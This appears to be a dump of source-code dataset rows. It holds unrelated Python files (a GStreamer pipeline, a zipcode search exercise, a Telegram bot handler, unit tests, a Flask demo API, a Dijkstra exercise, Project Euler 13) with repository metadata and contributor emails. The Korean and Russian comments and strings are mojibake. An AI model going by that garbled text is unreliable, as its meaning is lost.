caps = Gst.caps_from_string("video/x-raw, format=(string){BGR, GRAY8}; video/x-bayer,format=(string){rggb,bggr,grbg,gbrg}")
asink.set_property("caps", caps)
asink.connect('new-sample', new_sample)
pipeline.add(tcpsrc)
pipeline.add(gdepay)
pipeline.add(rdepay)
pipeline.add(avdec)
pipeline.add(vidconvert)
pipeline.add(asink)
tcpsrc.link(gdepay)
gdepay.link(rdepay)
rdepay.link(avdec)
avdec.link(vidconvert)
vidconvert.link(asink)
pipeline.set_state(Gst.State.PLAYING)
return pipeline
if __name__ == "__main__":
try:
pipeline = start_consume()
bus = pipeline.get_bus()
while True:
message = bus.timed_pop_filtered(10000, Gst.MessageType.ANY)
if img_arr is not None:
cv2.imshow("appsink image arr", img_arr)
cv2.waitKey(1)
except KeyboardInterrupt:
print "Closing pipeline"
pipeline.set_state(Gst.State.NULL)
loop.quit()
|
[
"uniray7@gmail.com"
] |
uniray7@gmail.com
|
48b762312553cd9cc610d46d0e8cf948fa131020
|
0faac0c32c47715b7b6c3c96264a0cc4cbe9bfca
|
/Hello/test/Step18_File2.py
|
cc8012ee481dbaa050b4f3a9b3e20fbefebea06a
|
[] |
no_license
|
hyunhee7/python_work
|
339a61c2361a8b37bd7c2c04b7ae5b92c63fb5b2
|
31adb3105fcad6254327f3c383d905b7592cd4af
|
refs/heads/master
| 2021-01-15T13:29:25.231833
| 2017-08-22T09:38:11
| 2017-08-22T09:38:11
| 99,674,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,602
|
py
|
#-*- coding: utf-8 -*-
import re
import os
import codecs
sample = u"a b c ddd eee"
result=re.split(r"[\t]+",sample)
print result
cwd=os.getcwd()
filePath=cwd+os.sep
filePath=cwd+os.sep+"testFile.txt"
f=codecs.open(filePath,"r","utf-8")
while True:
data=f.readline()
if data=="":
break #๋ฐ๋ณต๋ฌธ ๋ธ๋ญ ๋น ์ ธ ๋์ค๊ธฐ
print data
# ์์ ์์ ๋ฅผ ์ฐธ๊ณ ํด์ ๊ฒ์์ด๋ฅผ ์
๋ ฅ๋ฐ์์
inputKeyword=raw_input("๊ฒ์ํ ๋,๋ฉด,๋ฆฌ ์
๋ ฅ:")
decodedKeyword=inputKeyword.decode("utf-8")
# ํด๋น ๊ฒ์์ด์ ๊ด๋ จ๋ ๋ชจ๋ ์ฃผ์๋ฅผ ์ถ๋ ฅํด ๋ณด์ธ์.
# ํ์ผ ์ด๊ธฐ
zipPath=os.getcwd()+os.sep+"zipcode.txt"
zipFile=codecs.open(zipPath,"r","utf-8")
print u"๊ฒ์์ค.."
while True:
#ํ์ค์ฉ ์ฝ์ด์จ๋ค.
data=zipFile.readline()
if data=="":
break
# ํ ์ค์ ์ ๋ณด๋ฅผ list type์ผ๋ก ๋ฐ์์จ๋ค.
info=re.split(r"[\t ]+", data)
# ๋ฐฐ์ด์ 3๋ฒ์งธ ๋ฐฉ์ ์
๋ ฅํ ํค์๋๊ฐ ์กด์ฌํ๋์ง ์ฌ๋ถ
result = bool(re.search(decodedKeyword, info[3]))
if result:
print data
zipFile.close()
# ํ์ผ ์ด๊ธฐ
zipFile=codecs.open(zipPath,"r","utf-8")
# ๋์ ์
๋ ฅํ๋ฉด ์ฐํธ๋ฒํธ๋ฅผ ์ถ๋ ฅํด๋ณด์ธ์
inputKeyword=raw_input("์ฐํธ๋ฒํธ๋ฅผ ์๊ณ ์ถ์ ๋ ์
๋ ฅ:")
decodedKeyword=inputKeyword.decode("utf-8")
print "๊ฒ์์ค..."
while True:
data=zipFile.readline()
if data=="":
break
info=re.split(r"[\t ]+", data)
result = bool(re.search(decodedKeyword, info[3]))
if result:
print decodedKeyword," ์ ์ฐํธ๋ฒํธ:", info[0]
zipFile.close()
|
[
"hyunhi7@naver.com"
] |
hyunhi7@naver.com
|
76e6c696bc83ab86a4ee1ee00fc9368eb01b4cd9
|
cd208b4a40be8bf166da79fdc126dbcb71e95a7d
|
/app/handlers/states/fridge_expiration_date_error.py
|
75c7ccfc48b996199ca1a48138350c74efbc7c24
|
[
"MIT"
] |
permissive
|
Moirted/MyPersonalKitchenBot
|
63a2b1be6e21e90ed908c9f3162bd085162cd83f
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
refs/heads/main
| 2023-04-21T12:17:52.486113
| 2021-05-16T13:00:22
| 2021-05-16T13:00:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
import re
from aiogram import types
from app.misc import dp
from app.states import FridgeProductState
@dp.message_handler(lambda msg: not re.search(r'^\d{1,2}\.\d{1,2}\.\d{4}$', msg.text), state=FridgeProductState.expiration_date)
async def handler_fridge_expiration_date_error(msg: types.Message):
return await msg.answer('ะะตะฟัะฐะฒะธะปัะฝัะน ัะพัะผะฐั ะดะฐัั!\nะะฒะตะดะธัะต ััะพะบ ะณะพะดะฝะพััะธ ะฒ ัะพัะผะฐัะต "ะดะด.ะผะผ.ะณะณะณะณ"')
|
[
"ka.kovjarova@gmail.com"
] |
ka.kovjarova@gmail.com
|
8e504f26c47a2b948e4431092fbbffd69d254a57
|
a1119965e2e3bdc40126fd92f4b4b8ee7016dfca
|
/branches/repy_v2/portability/tests/py_z_test_importcachedir_recursive.py
|
abec03bba9894531fbe8825ee4f921f2be201cb4
|
[
"MIT"
] |
permissive
|
SeattleTestbed/attic
|
0e33211ddf39efdbcf5573d4fc7fa5201aa7310d
|
f618a962ce2fd3c4838564e8c62c10924f5df45f
|
refs/heads/master
| 2021-06-10T23:10:47.792847
| 2017-05-15T12:05:43
| 2017-05-15T12:05:43
| 20,154,061
| 0
| 1
| null | 2014-10-16T17:21:06
| 2014-05-25T12:34:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,395
|
py
|
"""
Test if a call to importcachedir is handled well.
"""
import repyhelper
import os
import sys
import shutil
# clean up any left over data...
try:
shutil.rmtree('importcachetest')
except (OSError, IOError):
# it's okay if it doesn't exist...
pass
os.mkdir('importcachetest')
# append this to the Python path...
sys.path = sys.path + ['importcachetest']
# write files there
repyhelper.set_importcachedir('importcachetest')
repyhelper.translate_and_import('rhtestrecursion_1.r2py')
# This should work...
try:
# note: this is a function from rhtest_recursion_1. I'm not calling it...
one
except NameError:
print "Failed to import rhtest_recursion_1 when using importcachetest"
# This should work...
try:
# note: this is a function from rhtest_recursion_2. I'm not calling it...
two
except NameError:
print "Failed to import rhtest_recursion_2 when using importcachetest"
# and the files should be in importcachetest...
if not os.path.exists('importcachetest/rhtestrecursion_1_repy.py'):
print "The rhtest_recursion_1.r2py file was not preprocessed to importcache test because 'importcachetest/rhtest_recursion_1_repy.py' does not exist"
if not os.path.exists('importcachetest/rhtestrecursion_2_repy.py'):
print "The rhtest_recursion_2.r2py file was not preprocessed to importcache test because 'importcachetest/rhtest_recursion_2_repy.py' does not exist"
|
[
"USER@DOMAIN"
] |
USER@DOMAIN
|
082aebcc4bdbe996a74214e3ea8ffb28e8db2238
|
0b06cfba4d3670dfa7bda5345bec3bba82b465bb
|
/tests/test_otf.py
|
ae47b46fa5f19c73ce80141113edf6ce6e14a5ff
|
[
"MIT"
] |
permissive
|
chllym/prysm
|
f570151783cd613af4fddc3ca4a5d207deac23ee
|
579dfc0ae58fab5e396a13613da7f87d2484f083
|
refs/heads/master
| 2020-04-01T01:56:33.808037
| 2018-09-09T00:48:46
| 2018-09-09T00:48:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,204
|
py
|
''' Optical Transfer Function (OTF) unit tests.
'''
import pytest
import numpy as np
from prysm import otf
from prysm.fttools import forward_ft_unit
SAMPLES = 32
LIM = 1e3
@pytest.fixture
def mtf():
x, y = forward_ft_unit(1/1e3, 128), forward_ft_unit(1/1e3, 128)
xx, yy = np.meshgrid(x, y)
dat = np.sin(xx)
return otf.MTF(data=dat, unit_x=x) # do not pass unit_y, simultaneous test for unit_y=None
def test_mtf_plot2d_functions(mtf):
fig, ax = mtf.plot2d()
assert fig
assert ax
def test_mtf_plot_tan_sag_functions(mtf):
fig, ax = mtf.plot_tan_sag()
assert fig
assert ax
@pytest.mark.parametrize('azimuth', [None, 0, [0, 90, 90, 90]])
def test_mtf_exact_polar_functions(mtf, azimuth):
freqs = [0, 1, 2, 3]
mtf_ = mtf.exact_polar(freqs, azimuth)
assert type(mtf_) is np.ndarray
@pytest.mark.parametrize('y', [None, 0, [0, 1, 2, 3]])
def test_mtf_exact_xy_functions(mtf, y):
x = [0, 1, 2, 3]
mtf_ = mtf.exact_xy(x, y)
assert type(mtf_) is np.ndarray
def test_mtf_exact_tan_functions(mtf):
assert type(mtf.exact_tan(0)) is np.ndarray
def test_mtf_exact_sag_functions(mtf):
assert type(mtf.exact_sag(0)) is np.ndarray
|
[
"brandondube@gmail.com"
] |
brandondube@gmail.com
|
f9943ec6fc0cdb50adebc68165cf6d6842c97bee
|
a81386ef282db3302efcb051e63c7d5cfc1f46f1
|
/api_server.py
|
e75f4d7194f184de9e96207e1de19f3938b4b114
|
[] |
no_license
|
yilisong007/blog-test
|
ede870ac77c834120313f49554a7c188437e53d8
|
84295d7c58251824176cd08842bb444acd11f5fd
|
refs/heads/master
| 2020-12-09T16:51:42.842449
| 2020-06-22T01:36:43
| 2020-06-22T01:36:43
| 233,362,639
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
import json
from flask import Flask
from flask import request, make_response
app = Flask(__name__)
users_dict = {}
@app.route('/api/users/<int:uid>', methods=['POST'])
def create_user(uid):
user = request.get_json()
if uid not in users_dict:
result = {
'success': True,
'msg': "user created successfully."
}
status_code = 201
users_dict[uid] = user
else:
result = {
'success': False,
'msg': "user already existed."
}
status_code = 500
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['PUT'])
def update_user(uid):
user = users_dict.get(uid, {})
if user:
user = request.get_json()
success = True
status_code = 200
else:
success = False
status_code = 404
result = {
'success': success,
'data': user
}
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
if __name__ == '__main__':
app.run()
|
[
"781095668@qq.com"
] |
781095668@qq.com
|
921b0a3858fedb52134f99f183054625c52f8e55
|
277a1801abb3eb9886f016e2f5d39a5c5960507f
|
/kitna_paise.py
|
06903dc2f6702d473164d66ae8a7d9a9e387f933
|
[] |
no_license
|
maurya-subhashini1/List
|
ede3df015b8e3e2e51212fb2df49de936219be18
|
9d8d23950dc2aab3310060cc6123ed76a8e86508
|
refs/heads/main
| 2023-05-14T10:37:06.070670
| 2021-06-01T10:41:27
| 2021-06-01T10:41:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 427
|
py
|
kitna_paisa_hai = [3000, 600000, 324990909, 90990900, 30000, 5600000, 690909090, 31010101, 532010, 510, 4100]
i=0
l=[]
k=[]
h=[]
while i<len(kitna_paisa_hai):
if kitna_paisa_hai[i]>=10000000:
l.append(kitna_paisa_hai[i])
elif kitna_paisa_hai[i]>=100000:
k.append(kitna_paisa_hai[i])
else:
h.append(kitna_paisa_hai[i])
i=i+1
print("crodpati=",l)
print("lakhpati=",k)
print("Diwale=",h)
|
[
"noreply@github.com"
] |
maurya-subhashini1.noreply@github.com
|
1faf668a6ae2562426ca1664a4dbc27ce79a797e
|
bd04d6c138665d01349f62d912514c5a7343a6d0
|
/algorithm/๋ค์ต์คํธ๋ผ.py
|
3e969d4ecebc379059c1c964fa6a9909b4f66271
|
[] |
no_license
|
gvg4991/TIL
|
fe6209c21a228d3500ca64615df2f1066a5d0f11
|
ada8fbdc88555d327beae2ae8eee16b4739240aa
|
refs/heads/master
| 2021-06-08T06:44:37.554473
| 2021-06-06T09:06:47
| 2021-06-06T09:06:47
| 162,512,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,262
|
py
|
import sys
sys.stdin = open('input.txt')
n,k = map(int,input().split()) #๋
ธ๋ ์, ๊ฒฝ๋ก ์
datas = [[987654321]*n for _ in range(n)]
for case in range(k):
start,end,dist = map(str,input().split())
if start == 'a': start = 0
elif start == 'b': start = 1
elif start == 'c': start = 2
elif start == 'd': start = 3
elif start == 'e': start = 4
elif start == 'f': start = 5
if end == 'a': end = 0
elif end == 'b': end = 1
elif end == 'c': end = 2
elif end == 'd': end = 3
elif end == 'e': end = 4
elif end == 'f': end = 5
datas[start][end] = int(dist)
# print(datas)
begin = 0
distance = datas[begin] #์ฒ์ ๊ฑฐ๋ฆฌ๋ฆฌ์คํธ๋ idx=0์ ์ถ๋ฐ์ง๋ก ํ๋ ๊ฑฐ๋ฆฌ
# print(distance)
# for now in range(n):
# if not distance[now]:
# distance[now] = 987654321
# print(distance)
# node = [0]*n
# for i in range(n):
# node[i] = i
# # print(node)
node = [1,2,3,4,5]
path = []
while node:
result = 987654321
# print(distance)
for now in node: #๋จ์์๋ ๋
ธ๋๋ฅผ ์์๋๋ก ๋ถ๋ฌ์ด
# print(now)
if distance[now] < result: #๋ถ๋ฌ์จ ๋
ธ๋์ distance๊ฐ ์ง๊ธ๊น์ง ๊ฒฐ๊ณผ๊ฐ๋ณด๋ค ์์ผ๋ฉด
result = distance[now] #distance๋ฅผ result์ ๋ฃ์ (3
idx = distance.index(result) #๊ฒฐ๊ณผ๊ฐ์ ์ธ๋ฑ์ค ์ถ์ถ
path.append(idx) #๊ฒฝ๋ก์ ์ถ๊ฐ
# print(idx)
node.remove(idx) #์ธ๋ฑ์ค๊ฐ์ ๋
ธ๋๋ฅผ ์ ๊ฑฐ
for next in node: #๋ค์ ์์๋ฅผ ์ ํ๊ธฐ ์ํด ์ ๊ฑฐ ํ ๋จ์ ๋
ธ๋๋ฅผ ์์๋๋ก ๋ถ๋ฌ์ด
# print('#{} {} {}'.format(distance[next],distance[idx],datas[idx][next])) #์๋ ๊ฐ์์๋ ๊ฑฐ๋ฆฌ, ์ง๊ธ์์น๊น์ง ๊ฑฐ๋ฆฌ, ์ง๊ธ์์น์์ ๊ฐ์์๋ ๊ฑฐ๋ฆฌ
if distance[next] > distance[idx] + datas[idx][next]: #๊ธฐ์กด์ ์์น์์ ๋์คํด์ค๋ณด๋ค ์ง๊ธ ์์น์์๊ฐ๋ ๊ฑฐ๋ฆฌ๊ฐ ๋ ์์ผ๋ฉด
distance[next] = distance[idx] + datas[idx][next]
print(distance[-1])
print(path)
# while node:
# result = 987654321
# for next in range(n):
# if not next in visited and distance[next] < result:
# result = distance[next]
# now = distance.index(result)
# visited.append(now)
# # for target in range(n):
# # if not target in visited and distance[target] > datas[now][target]:
# # distance[target] = datas[now][target]
# print(distance)
# print(visited)
# begin = 0
# distance = datas[begin]
# visited = []
# while len(visited) < n:
# result = 987654321
# for next in range(n):
# if not next in visited and distance[next] < result:
# result = distance[next]
# now = distance.index(result)
# visited.append(now)
# # for target in range(n):
# # if not target in visited and distance[target] > datas[now][target]:
# # distance[target] = datas[now][target]
# print(distance)
# print(visited)
# if result > distance[next]:
# result = distance[next] #3
# now = next #b
# def dijkstra(s,e,d):
# # if ์ข
๋ฃ
#
# distance = datas[s]
# result = 987654321
# for next in range(n):
# if result > distance[next]:
# result = distance[next] # 3
# now = next # b
|
[
"14.73oo6o19@gmail.com"
] |
14.73oo6o19@gmail.com
|
b23744c68c3c3cd3a868e3bb9976c9740efd0960
|
72be8cdac574c94e2aa094ff6022f232a285831b
|
/Python/013.py
|
d2882a8e09f31219c6ff7057c35bbff6f4e11b5c
|
[
"MIT"
] |
permissive
|
jaimeliew1/Project_Euler_Solutions
|
1def5a2514687f9546db1a025416004229352201
|
d014acd22be7f8920865058a48415072ffc7961f
|
refs/heads/master
| 2022-12-01T08:20:02.554540
| 2022-11-23T21:40:42
| 2022-11-23T21:40:42
| 126,694,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,437
|
py
|
# -*- coding: utf-8 -*-
"""
Solution to Project Euler problem 13
Author: Jaime Liew
https://github.com/jaimeliew1/Project_Euler_Solutions
"""
data = '''37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690'''
def run():
numbers = []
for line in data.split('\n'):
numbers.append(int(line))
return str(sum(numbers))[:10]
if __name__ == "__main__":
print(run())
|
[
"33415790+jaimeliew1@users.noreply.github.com"
] |
33415790+jaimeliew1@users.noreply.github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.